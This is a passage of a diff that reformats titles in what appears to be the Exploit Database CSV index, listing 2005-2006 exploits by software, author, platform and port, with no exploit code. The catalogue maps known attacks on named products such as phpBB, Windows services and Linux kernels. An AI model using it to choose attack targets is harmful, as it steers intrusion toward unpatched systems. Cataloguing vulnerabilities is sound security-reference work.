<= 1.3.7.3 Remote Format String Exploit",2005-02-09,"Serkan Akpolat",linux,remote,8080 @@ -634,7 +634,7 @@ id,file,description,date,author,platform,type,port 808,platforms/php/webapps/808.txt,"CMScore SQL Injection Exploit",2005-02-10,GHC,php,webapps,0 809,platforms/php/webapps/809.txt,"Chipmunk Forums SQL Injection Exploit",2005-02-10,GHC,php,webapps,0 810,platforms/windows/dos/810.c,"Armagetron Advanced <= 0.2.7.0 Server Crash Exploit",2005-02-10,"Luigi Auriemma",windows,dos,0 -811,platforms/windows/local/811.c,"DelphiTurk e-Posta v1.0 Local Exploit",2005-02-10,Kozan,windows,local,0 +811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local Exploit",2005-02-10,Kozan,windows,local,0 812,platforms/linux/remote/812.c,"Exim <= 4.43 auth_spa_server() Remote PoC Exploit",2005-02-12,"Yuri Gushin",linux,remote,25 813,platforms/windows/dos/813.c,"Quake 3 Engine Infostring Crash and Shutdown Exploit",2005-02-12,"Luigi Auriemma",windows,dos,0 814,platforms/php/webapps/814.txt,"MercuryBoard <= 1.1.1 Working Sql Injection",2005-02-12,Zeelock,php,webapps,0 @@ -663,7 +663,7 @@ id,file,description,date,author,platform,type,port 838,platforms/multiple/dos/838.pl,"WebConnect 6.4.4 - 6.5 Directory Traversal and Denial of Service Exploit",2005-02-24,Karak0rsan,multiple,dos,0 839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager Local Password Disclosure Exploit",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0 840,platforms/cgi/webapps/840.c,"AWStats 5.7 - 6.2 Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0 -841,platforms/windows/dos/841.c,"Soldier of Fortune 2 <= 1.03 ""cl_guid"" Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0 +841,platforms/windows/dos/841.c,"Soldier of Fortune 2 <= 1.03 ""cl_guid"" - Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0 842,platforms/linux/dos/842.c,"wu-ftpd <= 2.6.2 File Globbing Denial of Service Exploit",2005-02-25,str0ke,linux,dos,0 843,platforms/windows/dos/843.c,"Knet <= 1.04c Buffer Overflow Denial of Service Exploit",2005-02-25,CorryL,windows,dos,0 844,platforms/windows/local/844.asm,"eXeem 0.21 Local Password Disclosure Exploit (asm)",2005-02-26,illwill,windows,local,0 @@ -693,7 +693,7 @@ id,file,description,date,author,platform,type,port 870,platforms/php/webapps/870.txt,"Download Center Lite (DCL) <= 1.5 Remote File Inclusion",2005-03-10,"Filip Groszynski",php,webapps,0 871,platforms/php/webapps/871.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0 872,platforms/php/webapps/872.pl,"SocialMPN Arbitrary File Injection Exploit",2005-03-11,y3dips,php,webapps,0 -873,platforms/php/webapps/873.txt,"phpDEV5 Remote Default Insecure Users Vuln",2005-03-11,Ali7,php,webapps,0 +873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users Vuln",2005-03-11,Ali7,php,webapps,0 874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 ""3G-A11"" Remote Buffer Overflow Exploit (2)",2005-03-12,"Leon Juranic",windows,dos,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x UDP License Service Remote Buffer Overflow Exploit",2005-03-13,class101,windows,remote,5093 876,platforms/linux/local/876.c,"PaX Double-Mirrored VMA munmap Local Root Exploit",2005-03-14,"Christophe Devine",linux,local,0 @@ -708,7 +708,7 @@ id,file,description,date,author,platform,type,port 885,platforms/windows/local/885.cpp,"iPool <= 1.6.81 Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 886,platforms/windows/dos/886.pl,"PlatinumFTP <= 1.0.18 Multiple Remote Denial of Service Exploit",2005-03-17,ports,windows,dos,0 887,platforms/windows/dos/887.py,"MailEnable 1.8 Remote Format String Denial of Service Exploit",2005-03-17,"Tal Zeltzer",windows,dos,0 -888,platforms/windows/dos/888.txt,"phpDEV5 System-Call Local Denial of Service Exploit",2005-03-17,Ali7,windows,dos,0 +888,platforms/windows/dos/888.txt,"phpDEV5 - System-Call Local Denial of Service Exploit",2005-03-17,Ali7,windows,dos,0 889,platforms/php/webapps/889.pl,"phpBB <= 2.0.12 Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0 890,platforms/linux/local/890.pl,"PostScript Utilities - psnup Argument Buffer Overflow",2005-03-21,lammat,linux,local,0 891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0 @@ -740,8 +740,8 @@ id,file,description,date,author,platform,type,port 919,platforms/windows/local/919.c,"FireFly 1.0 Local Proxy Password Disclosure Exploit",2005-04-07,Kozan,windows,local,0 920,platforms/windows/local/920.c,"P2P Share Spy 2.2 Local Password Disclosure Exploit",2005-04-07,Kozan,windows,local,0 921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x - 7.6 Top module Remote Sql Injection Exploit (working)",2005-04-07,"Fabrizi Andrea",php,webapps,0 -922,platforms/cgi/webapps/922.pl,"The Includer CGI <= 1.0 Remote Command Execution (new version)",2005-04-08,GreenwooD,cgi,webapps,0 -923,platforms/cgi/webapps/923.pl,"The Includer CGI <= 1.0 Remote Command Execution (new version2)",2005-04-08,K-C0d3r,cgi,webapps,0 +922,platforms/cgi/webapps/922.pl,"The Includer CGI <= 1.0 - Remote Command Execution (version 1)",2005-04-08,GreenwooD,cgi,webapps,0 +923,platforms/cgi/webapps/923.pl,"The Includer CGI <= 1.0 - Remote Command Execution (2)",2005-04-08,K-C0d3r,cgi,webapps,0 924,platforms/linux/local/924.c,"sash <= 3.7 Local Buffer Overflow Exploit",2005-04-08,lammat,linux,local,0 925,platforms/asp/webapps/925.txt,"ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0 926,platforms/linux/local/926.c,"Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)",2005-10-26,qobaiashi,linux,local,0 @@ -766,7 +766,7 @@ id,file,description,date,author,platform,type,port 945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server (GET Request) Remote BoF Exploit",2005-04-24,cybertronic,windows,remote,80 946,platforms/multiple/dos/946.c,"PostgreSQL <= 8.01 Remote Reboot Denial of Service Exploit",2005-04-19,ChoiX,multiple,dos,0 947,platforms/windows/remote/947.pl,"MS Exchange Server Remote Code Execution Exploit (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25 -948,platforms/multiple/dos/948.c,"Multiple OS (win32/aix/cisco) Crafted ICMP Messages DoS Exploit",2005-04-20,houseofdabus,multiple,dos,0 +948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages DoS Exploit",2005-04-20,houseofdabus,multiple,dos,0 949,platforms/windows/remote/949.c,"PMsoftware Simple Web Server 1.0 Remote Stack Overflow Exploit",2005-04-20,c0d3r,windows,remote,80 950,platforms/linux/local/950.c,"BitchX <= 1.0c20 Local Buffer Overflow Exploit",2005-04-21,sk,linux,local,0 951,platforms/windows/local/951.py,"MS Jet Database (msjet40.dll) Reverse Shell Exploit",2005-04-22,"Jean Luc",windows,local,0 @@ -810,7 +810,7 @@ id,file,description,date,author,platform,type,port 997,platforms/linux/local/997.sh,"Linux Mandrake <= 10.2 cdrdao Local Root Exploit (unfixed)",2005-05-17,newbug,linux,local,0 998,platforms/linux/dos/998.c,"Linux Kernel <= 2.6.12-rc4 (ioctl_by_bdev) Local Denial of Service Exploit",2005-05-17,alert7,linux,dos,0 999,platforms/linux/dos/999.c,"Gaim <= 1.2.1 URL Handling Remote Stack Overflow Exploit",2005-05-17,Ron,linux,dos,0 -1000,platforms/windows/dos/1000.cpp,"MS Windows XP/2003 IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0 +1000,platforms/windows/dos/1000.cpp,"MS Windows XP/2003 - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0 1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit (Instructions w/ Exploit)",2005-05-19,watercloud,aix,local,0 1003,platforms/php/webapps/1003.c,"Fusion SBX <= 1.2 Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0 1004,platforms/cgi/webapps/1004.php,"WebAPP v0.9.9.2.1 Remote Command Execution Exploit (2nd updated)",2005-05-20,Nikyt0x,cgi,webapps,0 @@ -912,7 +912,7 @@ id,file,description,date,author,platform,type,port 1103,platforms/php/webapps/1103.txt,"phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 1104,platforms/windows/dos/1104.cpp,"MS Windows Netman Service Local Denial of Service Exploit",2005-07-14,bkbll,windows,dos,0 1105,platforms/windows/dos/1105.c,"NetPanzer <= 0.8 Remote Denial of Service Exploit",2005-07-14,"Luigi Auriemma",windows,dos,0 -1106,platforms/php/webapps/1106.txt,"e107 <= 0.617 XSS Remote Cookie Disclosure Exploit",2005-07-14,Warlord,php,webapps,0 +1106,platforms/php/webapps/1106.txt,"e107 <= 0.617 - XSS Remote Cookie Disclosure Exploit",2005-07-14,Warlord,php,webapps,0 1107,platforms/windows/dos/1107.pl,"Remote Control Server 1.6.2 Denial of Service Exploit",2005-07-15,basher13,windows,dos,0 1108,platforms/windows/remote/1108.pl,"Small HTTP Server <= 3.05.28 Arbitrary Data Execution Exploit",2005-07-15,basher13,windows,remote,0 1109,platforms/windows/dos/1109.pl,"DzSoft PHP Editor <= 3.1.2.8 Denial of Service Exploit",2005-07-15,basher13,windows,dos,0 @@ -943,13 +943,13 @@ id,file,description,date,author,platform,type,port 1138,platforms/linux/remote/1138.c,"nbSMTP <= 0.99 (util.c) Client-Side Command Execution Exploit",2005-08-05,CoKi,linux,remote,0 1139,platforms/linux/remote/1139.c,"Ethereal 10.x AFP Protocol Dissector Remote Format String Exploit",2005-08-06,vade79,linux,remote,0 1140,platforms/php/webapps/1140.php,"Flatnuke <= 2.5.5 Remote Code Execution",2005-08-08,rgod,php,webapps,0 -1142,platforms/php/webapps/1142.php,"Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit",2005-08-09,Kartoffelguru,php,webapps,0 +1142,platforms/php/webapps/1142.php,"Wordpress <= 1.5.1.3 - Remote Code Execution 0Day",2005-08-09,Kartoffelguru,php,webapps,0 1143,platforms/windows/dos/1143.sys,"MS Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit",2005-08-09,"Tom Ferris",windows,dos,0 1144,platforms/windows/remote/1144.html,"MS Internet Explorer (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 1145,platforms/php/webapps/1145.pm,"Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)",2005-08-10,str0ke,php,webapps,0 1146,platforms/windows/remote/1146.c,"MS Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec Remote File Access Exploit (windows)",2005-08-11,n/a,windows,remote,10000 -1149,platforms/windows/remote/1149.c,"MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 +1149,platforms/windows/remote/1149.c,"MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 1150,platforms/windows/remote/1150.pm,"ZENworks 6.5 Desktop/Server Management Remote Stack Overflow",2005-08-12,n/a,windows,remote,1761 1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit",2005-08-12,n/a,windows,remote,143 1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 iMonitor Remote Stack Overflow",2005-08-12,n/a,windows,remote,8008 @@ -964,8 +964,8 @@ id,file,description,date,author,platform,type,port 1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server <= 5.14 Denial of Service Exploit",2005-06-07,"Reed Arvin",windows,dos,0 1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition Version <= 5.2.2 DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0 1164,platforms/windows/dos/1164.pl,"BusinessMail <= 4.60.00 Remote Buffer Overflow Exploit",2005-07-30,"Reed Arvin",windows,dos,0 -1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 (SMTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 -1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 (FTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 +1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 +1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 1167,platforms/solaris/remote/1167.pm,"Solaris <= 10 LPD Arbitrary File Delete Exploit (metasploit)",2005-08-19,Optyx,solaris,remote,0 1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 Temporary File Parsing Buffer Overflow Vulnerability",2005-08-19,ATmaCA,windows,local,0 1170,platforms/linux/local/1170.c,"Debian 2.2 /usr/bin/pileup Local Root Exploit",2001-07-13,"Charles Stevenson",linux,local,0 @@ -1016,7 +1016,7 @@ id,file,description,date,author,platform,type,port 1221,platforms/php/webapps/1221.php,"CuteNews <= 1.4.0 (shell inject) Remote Command Execution Exploit",2005-09-17,rgod,php,webapps,0 1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command DoS Exploit",2005-09-19,basher13,windows,dos,0 1223,platforms/windows/remote/1223.c,"Mercury Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit",2005-09-20,c0d3r,windows,remote,143 -1224,platforms/windows/remote/1224.html,"Mozilla Browsers 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (v2)",2005-09-22,SkyLined,windows,remote,0 +1224,platforms/windows/remote/1224.html,"Mozilla Browsers 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (2)",2005-09-22,SkyLined,windows,remote,0 1225,platforms/php/webapps/1225.php,"My Little Forum <= 1.5 (searchstring) SQL Injection Exploit",2005-09-22,rgod,php,webapps,0 1226,platforms/php/webapps/1226.php,"phpMyFAQ <= 1.5.1 (User-Agent) Remote Shell Injection Exploit",2005-09-23,rgod,php,webapps,0 1227,platforms/php/webapps/1227.php,"MailGust <= 1.9 (board takeover) SQL Injection Exploit",2005-09-24,rgod,php,webapps,0 @@ -1048,7 +1048,7 @@ id,file,description,date,author,platform,type,port 1255,platforms/windows/dos/1255.html,"Opera <= 8.02 Remote Denial of Service Exploit (2)",2005-10-16,posidron,windows,dos,0 1256,platforms/multiple/dos/1256.pl,"Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit",2005-10-17,Kubbo,multiple,dos,0 -1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 (resetcore.php) Remote SQL Injection Exploit",2005-10-18,rgod,linux,remote,0 +1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) Remote SQL Injection Exploit",2005-10-18,rgod,linux,remote,0 1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server Preauthentication Directory Listing Exploit (meta)",2005-10-19,Optyx,hp-ux,remote,0 1260,platforms/windows/remote/1260.pm,"MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta)",2005-10-19,"H D Moore",windows,remote,80 1261,platforms/hp-ux/remote/1261.pm,"HP-UX <= 11.11 lpd Remote Command Execution Exploit (meta)",2005-10-19,"H D Moore",hp-ux,remote,515 @@ -1057,21 +1057,21 @@ id,file,description,date,author,platform,type,port 1264,platforms/windows/remote/1264.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (win32)",2005-10-20,"Kevin Finisterre",windows,remote,13722 1265,platforms/osx/remote/1265.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (OS X)",2005-10-20,"Kevin Finisterre",osx,remote,13722 1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 - 0.10.12 SLIMP3 Remote Buffer Overflow PoC",2005-10-20,Sowhat,windows,dos,0 -1267,platforms/linux/local/1267.c,"XMail 1.21 (-t Command Line Option) Local Root Buffer Overflow Exploit",2005-10-20,qaaz,linux,local,0 +1267,platforms/linux/local/1267.c,"XMail 1.21 (-t Command Line Option) Local Root Buffer Overflow Exploit",2005-10-20,qaaz,linux,local,0 1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System <= 5.0 (register users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 1269,platforms/windows/dos/1269.c,"MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)",2005-10-21,n/a,windows,dos,0 1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 SQL Injection / Remote Command Execution Exploit",2005-10-23,rgod,php,webapps,0 1271,platforms/windows/dos/1271.c,"MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0 1272,platforms/linux/remote/1272.c,"Snort <= 2.4.2 Back Orifice Parsing Remote Buffer Overflow Exploit",2005-10-25,rd,linux,remote,0 1273,platforms/php/webapps/1273.pl,"TClanPortal <= 1.1.3 (id) Remote SQL Injection Exploit",2005-10-26,Devil-00,php,webapps,0 -1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote DoS",2005-10-27,Expanders,hardware,dos,0 +1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote DoS",2005-10-27,Expanders,hardware,dos,0 1276,platforms/windows/dos/1276.html,"MS Internet Explorer 6.0 (mshtmled.dll) Denial of Service Exploit",2005-10-28,"Tom Ferris",windows,dos,0 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit",2005-10-29,ATmaCA,windows,remote,0 1278,platforms/php/webapps/1278.pl,"Subdreamer 2.2.1 SQL Injection / Command Execution Exploit",2005-10-31,RusH,php,webapps,0 1279,platforms/windows/remote/1279.pm,"Snort <= 2.4.2 BackOrifice Remote Buffer Overflow Exploit (meta)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 (m) Remote SQL Injection Exploit",2005-11-02,Devil-00,php,webapps,0 1281,platforms/windows/dos/1281.c,"Battle Carry <= .005 Socket Termination Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 -1282,platforms/windows/dos/1282.c,"Blitzkrieg 2 <= 1.21 (server/client) Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 +1282,platforms/windows/dos/1282.c,"Blitzkrieg 2 <= 1.21 - (server/client) Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 1283,platforms/windows/dos/1283.c,"FlatFrag <= 0.3 Buffer Overflow / Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 1284,platforms/windows/dos/1284.c,"Glider collectn kill <= 1.0.0.0 Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1285,platforms/windows/dos/1285.c,"Scorched 3D <= 39.1 Multiple Vulnerabilities (All-in-One) (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 @@ -1089,7 +1089,7 @@ id,file,description,date,author,platform,type,port 1299,platforms/linux/local/1299.sh,"SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit",2005-11-08,Hunger,linux,local,0 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 Local Root Exploit",2005-11-09,"Charles Stevenson",linux,local,0 1310,platforms/linux/local/1310.txt,"Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit",2005-11-09,"Breno Silva Pinto",linux,local,0 -1311,platforms/bsd/local/1311.c,"FreeBSD (4.x , < 5.4) master.passwd Disclosure Exploit",2005-11-09,Kingcope,bsd,local,0 +1311,platforms/bsd/local/1311.c,"FreeBSD (4.x , < 5.4) master.passwd Disclosure Exploit",2005-11-09,Kingcope,bsd,local,0 1312,platforms/php/webapps/1312.php,"Moodle <= 1.6dev SQL Injection / Command Execution Exploit",2005-11-10,rgod,php,webapps,0 1313,platforms/windows/remote/1313.c,"Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0 1314,platforms/linux/remote/1314.rb,"Snort <= 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit (4)",2005-11-11,xwings,linux,remote,0 @@ -1148,7 +1148,7 @@ id,file,description,date,author,platform,type,port 1376,platforms/windows/dos/1376.c,"MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0 1377,platforms/windows/dos/1377.pl,"MS Windows IIS Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0 -1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 +1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21 1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0 @@ -1164,7 +1164,7 @@ id,file,description,date,author,platform,type,port 1396,platforms/windows/dos/1396.cpp,"MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0 1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)",2005-12-30,alert7,linux,local,0 1398,platforms/php/webapps/1398.pl,"CubeCart <= 3.0.6 Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0 -1399,platforms/asp/webapps/1399.txt,"WebWiz Products (1.0 , <= 3.06) Login Bypass SQL Injection Exploits",2005-12-30,DevilBox,asp,webapps,0 +1399,platforms/asp/webapps/1399.txt,"WebWiz Products (1.0 , <= 3.06) - Login Bypass SQL Injection Exploits",2005-12-30,DevilBox,asp,webapps,0 1400,platforms/php/webapps/1400.pl,"CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0 1401,platforms/php/webapps/1401.pl,"Valdersoft Shopping Cart <= 3.0 Remote Command Execution Exploit",2006-01-03,cijfer,php,webapps,0 1402,platforms/sco/local/1402.c,"SCO Openserver 5.0.7 (termsh) Local Privilege Escalation Exploit",2006-01-03,prdelka,sco,local,0 @@ -1202,9 +1202,9 @@ id,file,description,date,author,platform,type,port 1455,platforms/windows/local/1455.txt,"Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit",2006-01-26,Argeniss,windows,local,0 1456,platforms/linux/remote/1456.c,"SHOUTcast <= 1.9.4 File Request Format String Exploit (Leaked)",2006-01-28,crash-x,linux,remote,8000 1457,platforms/php/webapps/1457.txt,"phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit",2006-01-29,threesixthousan,php,webapps,0 -1458,platforms/windows/remote/1458.cpp,"Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (0-Day)",2006-01-29,ATmaCA,windows,remote,0 +1458,platforms/windows/remote/1458.cpp,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (0Day)",2006-01-29,ATmaCA,windows,remote,0 1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 (cookie) Remote Command Execution Exploit",2006-01-30,cijfer,php,webapps,0 -1460,platforms/windows/remote/1460.pm,"Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (meta)",2006-01-31,"H D Moore",windows,remote,0 +1460,platforms/windows/remote/1460.pm,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (meta)",2006-01-31,"H D Moore",windows,remote,0 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploit",2006-01-31,SkOd,php,webapps,0 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)",2006-01-31,HolyGhost,windows,remote,21 1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 SMTP Remote Buffer Overflow Exploit (meta)",2006-02-01,y0,windows,remote,21 @@ -1226,7 +1226,7 @@ id,file,description,date,author,platform,type,port 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0 -1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 (connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0 +1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 (connector.php) - Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0 1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0 1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532 1487,platforms/linux/remote/1487.c,"OpenVMPSd <= 1.3 Remote Format String Exploit (Multiple Targets)",2006-02-10,"Gotfault Security",linux,remote,1589 @@ -1241,9 +1241,9 @@ id,file,description,date,author,platform,type,port 1496,platforms/hardware/dos/1496.c,"D-Link Wireless Access Point (Fragmented UDP) DoS Exploit",2006-02-14,"Aaron Portnoy",hardware,dos,0 1498,platforms/php/webapps/1498.php,"webSPELL <= 4.01 (title_op) Remote SQL Injection Exploit",2006-02-14,x128,php,webapps,0 1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) <= 1.03 Multiple SQL Injection Exploit",2006-02-15,"HACKERS PAL",php,webapps,0 -1500,platforms/windows/dos/1500.cpp,"Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005)",2006-02-15,ATmaCA,windows,dos,0 +1500,platforms/windows/dos/1500.cpp,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005)",2006-02-15,ATmaCA,windows,dos,0 1501,platforms/php/webapps/1501.php,"PHPKIT <= 1.6.1R2 (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 -1502,platforms/windows/remote/1502.py,"Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 +1502,platforms/windows/remote/1502.py,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 1503,platforms/php/webapps/1503.pl,"YapBB <= 1.2 (cfgIncludeDirectory) Remote Command Execution Exploit",2006-02-16,cijfer,php,webapps,0 1504,platforms/windows/remote/1504.pm,"MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta)",2006-02-17,"H D Moore",windows,remote,0 1505,platforms/windows/remote/1505.html,"MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0 @@ -1256,7 +1256,7 @@ id,file,description,date,author,platform,type,port 1513,platforms/php/webapps/1513.php,"BXCP <= 0.2.9.9 (tid) Remote SQL Injection Exploit",2006-02-19,x128,php,webapps,0 1514,platforms/asp/webapps/1514.pl,"MiniNuke <= 1.8.2b (pages.asp) Remote SQL Injection Exploit",2006-02-19,nukedx,asp,webapps,0 1515,platforms/php/webapps/1515.pl,"GeekLog 1.* (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0 -1516,platforms/php/webapps/1516.php,"ilchClan <= 1.05g (tid) Remote SQL Injection Exploit",2006-02-20,x128,php,webapps,0 +1516,platforms/php/webapps/1516.php,"ilchClan <= 1.05g (tid) Remote SQL Injection Exploit",2006-02-20,x128,php,webapps,0 1517,platforms/php/webapps/1517.c,"PunBB <= 2.0.10 (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,webapps,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0 1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser (Safe File) Remote Code Execution Exploit",2006-02-22,"H D 